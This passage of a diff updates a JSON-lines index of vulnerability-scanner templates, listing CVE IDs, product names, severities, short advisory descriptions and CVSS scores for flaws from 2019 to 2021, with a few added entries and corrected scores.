service.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-15043.yaml"} {"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15107.yaml"} {"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15501.yaml"} -{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"} +{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"} {"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15713.yaml"} {"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15811.yaml"} {"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"} @@ -757,6 +759,7 @@ {"ID":"CVE-2020-0618","Info":{"Name":"Microsoft SQL Server Reporting Services - Remote Code Execution","Severity":"high","Description":"Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-0618.yaml"} {"ID":"CVE-2020-10148","Info":{"Name":"SolarWinds Orion API - Auth Bypass","Severity":"critical","Description":"SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10148.yaml"} {"ID":"CVE-2020-10199","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","Severity":"high","Description":"Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-10199.yaml"} +{"ID":"CVE-2020-10220","Info":{"Name":"rConfig 3.9 - SQL injection","Severity":"critical","Description":"An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10220.yaml"} {"ID":"CVE-2020-10546","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10546.yaml"} {"ID":"CVE-2020-10547","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10547.yaml"} {"ID":"CVE-2020-10548","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10548.yaml"} @@ -826,7 +829,7 @@ {"ID":"CVE-2020-17362","Info":{"Name":"Nova Lite \u003c 1.3.9 - Cross-Site Scripting","Severity":"medium","Description":"Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17362.yaml"} {"ID":"CVE-2020-17453","Info":{"Name":"WSO2 Carbon Management Console \u003c=5.10 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17453.yaml"} {"ID":"CVE-2020-17456","Info":{"Name":"SEOWON INTECH SLC-130 \u0026 SLR-120S - Unauthenticated Remote Code Execution","Severity":"critical","Description":"SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17456.yaml"} -{"ID":"CVE-2020-17463","Info":{"Name":"Fuel CMS 1.4.7 - SQL Injection","Severity":"high","Description":"FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17463.yaml"} +{"ID":"CVE-2020-17463","Info":{"Name":"Fuel CMS 1.4.7 - SQL Injection","Severity":"critical","Description":"FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17463.yaml"} {"ID":"CVE-2020-17496","Info":{"Name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","Severity":"critical","Description":"vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17496.yaml"} {"ID":"CVE-2020-17505","Info":{"Name":"Artica Web Proxy 4.30 - OS Command Injection","Severity":"high","Description":"Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-17505.yaml"} {"ID":"CVE-2020-17506","Info":{"Name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","Severity":"critical","Description":"Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17506.yaml"} @@ -904,7 +907,7 @@ {"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-27866.yaml"} {"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27982.yaml"} {"ID":"CVE-2020-27986","Info":{"Name":"SonarQube - Authentication Bypass","Severity":"high","Description":"SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\nSVN, and GitLab credentials via the api/settings/values URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27986.yaml"} -{"ID":"CVE-2020-28185","Info":{"Name":"TerraMaster TOS \u003c 4.2.06 - User Enumeration","Severity":"medium","Description":"User Enumeration vulnerability in TerraMaster TOS \u003c= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2020/CVE-2020-28185.yaml"} +{"ID":"CVE-2020-28185","Info":{"Name":"TerraMaster TOS \u003c 4.2.06 - User Enumeration","Severity":"medium","Description":"User Enumeration vulnerability in TerraMaster TOS \u003c= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28185.yaml"} {"ID":"CVE-2020-28188","Info":{"Name":"TerraMaster TOS - Unauthenticated Remote Command Execution","Severity":"critical","Description":"TerraMaster TOS \u003c= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-28188.yaml"} {"ID":"CVE-2020-28208","Info":{"Name":"Rocket.Chat \u003c3.9.1 - Information Disclosure","Severity":"medium","Description":"Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28208.yaml"} {"ID":"CVE-2020-28351","Info":{"Name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","Severity":"medium","Description":"Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING\u0026 page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-28351.yaml"} @@ -1050,7 +1053,7 @@ {"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"} {"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"} {"ID":"CVE-2021-22502","Info":{"Name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","Severity":"critical","Description":"Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22502.yaml"} -{"ID":"CVE-2021-22707","Info":{"Name":"EVlink City \u003c R8 V3.4.0.1 - Authentication Bypass","Severity":"critical","Description":"A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-22707.yaml"} +{"ID":"CVE-2021-22707","Info":{"Name":"EVlink City \u003c R8 V3.4.0.1 - Authentication Bypass","Severity":"critical","Description":"A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22707.yaml"} {"ID":"CVE-2021-22873","Info":{"Name":"Revive Adserver \u003c5.1.0 - Open Redirect","Severity":"medium","Description":"Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22873.yaml"} {"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22911.yaml"} {"ID":"CVE-2021-22986","Info":{"Name":"F5 iControl REST - Remote Command Execution","Severity":"critical","Description":"F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22986.yaml"} @@ -1125,7 +1128,7 @@ {"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"} {"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"} {"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"} -{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"} +{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"} {"ID":"CVE-2021-24970","Info":{"Name":"WordPress All-In-One Video Gallery \u003c2.5.0 - Local File Inclusion","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24970.yaml"} {"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24987.yaml"} {"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-24991.yaml"} @@ -1185,7 +1188,7 @@ {"ID":"CVE-2021-27520","Info":{"Name":"FUDForum 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27520.yaml"} {"ID":"CVE-2021-27561","Info":{"Name":"YeaLink DM 3.6.0.20 - Remote Command Injection","Severity":"critical","Description":"Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27561.yaml"} {"ID":"CVE-2021-27651","Info":{"Name":"Pega Infinity - Authentication Bypass","Severity":"critical","Description":"Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27651.yaml"} -{"ID":"CVE-2021-27670","Info":{"Name":"Appspace 6.2.4 - Server-Side Request Forgery","Severity":"high","Description":"Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-27670.yaml"} +{"ID":"CVE-2021-27670","Info":{"Name":"Appspace 6.2.4 - Server-Side Request Forgery","Severity":"critical","Description":"Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27670.yaml"} {"ID":"CVE-2021-27748","Info":{"Name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","Severity":"high","Description":"IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-27748.yaml"} {"ID":"CVE-2021-27850","Info":{"Name":"Apache Tapestry - Remote Code Execution","Severity":"critical","Description":"Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27850.yaml"} {"ID":"CVE-2021-27905","Info":{"Name":"Apache Solr \u003c=8.8.1 - Server-Side Request Forgery","Severity":"critical","Description":"Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27905.yaml"} @@ -1223,7 +1226,7 @@ {"ID":"CVE-2021-30461","Info":{"Name":"VoipMonitor \u003c24.61 - Remote Code Execution","Severity":"critical","Description":"VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-30461.yaml"} {"ID":"CVE-2021-30497","Info":{"Name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","Severity":"high","Description":"Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-30497.yaml"} {"ID":"CVE-2021-3110","Info":{"Name":"PrestaShop 1.7.7.0 - SQL Injection","Severity":"critical","Description":"PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-3110.yaml"} -{"ID":"CVE-2021-31195","Info":{"Name":"Microsoft Exchange Server - Cross-Site Scripting","Severity":"high","Description":"Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-31195.yaml"} +{"ID":"CVE-2021-31195","Info":{"Name":"Microsoft Exchange Server - Cross-Site Scripting","Severity":"medium","Description":"Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-31195.yaml"} {"ID":"CVE-2021-31249","Info":{"Name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","Severity":"medium","Description":"CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-31249.yaml"} {"ID":"CVE-2021-31250","Info":{"Name":"CHIYU TCP/IP Converter - Cross-Site Scripting","Severity":"medium","Description":"CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-31250.yaml"} {"ID":"CVE-2021-3129","Info":{"Name":"Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution","Severity":"critical","Description":"Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-3129.yaml"} @@ -1346,7 +1349,7 @@ {"ID":"CVE-2021-41349","Info":{"Name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","Severity":"medium","Description":"Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-41349.yaml"} {"ID":"CVE-2021-41381","Info":{"Name":"Payara Micro Community 5.2021.6 Directory Traversal","Severity":"high","Description":"Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41381.yaml"} {"ID":"CVE-2021-41432","Info":{"Name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-41432.yaml"} -{"ID":"CVE-2021-41460","Info":{"Name":"ECShop 4.1.0 - SQL Injection","Severity":"high","Description":"ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-41460.yaml"} +{"ID":"CVE-2021-41460","Info":{"Name":"ECShop 4.1.0 - SQL Injection","Severity":"high","Description":"ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41460.yaml"} {"ID":"CVE-2021-41467","Info":{"Name":"JustWriting - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41467.yaml"} {"ID":"CVE-2021-41569","Info":{"Name":"SAS/Internet 9.4 1520 - Local File Inclusion","Severity":"high","Description":"SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41569.yaml"} {"ID":"CVE-2021-41648","Info":{"Name":"PuneethReddyHC action.php SQL Injection","Severity":"high","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41648.yaml"} @@ -1410,6 +1413,7 @@ {"ID":"CVE-2021-46071","Info":{"Name":"ehicle Service Management System 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46071.yaml"} {"ID":"CVE-2021-46072","Info":{"Name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46072.yaml"} {"ID":"CVE-2021-46073","Info":{"Name":"Vehicle Service Management System 1.0 - Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46073.yaml"} +{"ID":"CVE-2021-46107","Info":{"Name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","Severity":"high","Description":"Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download 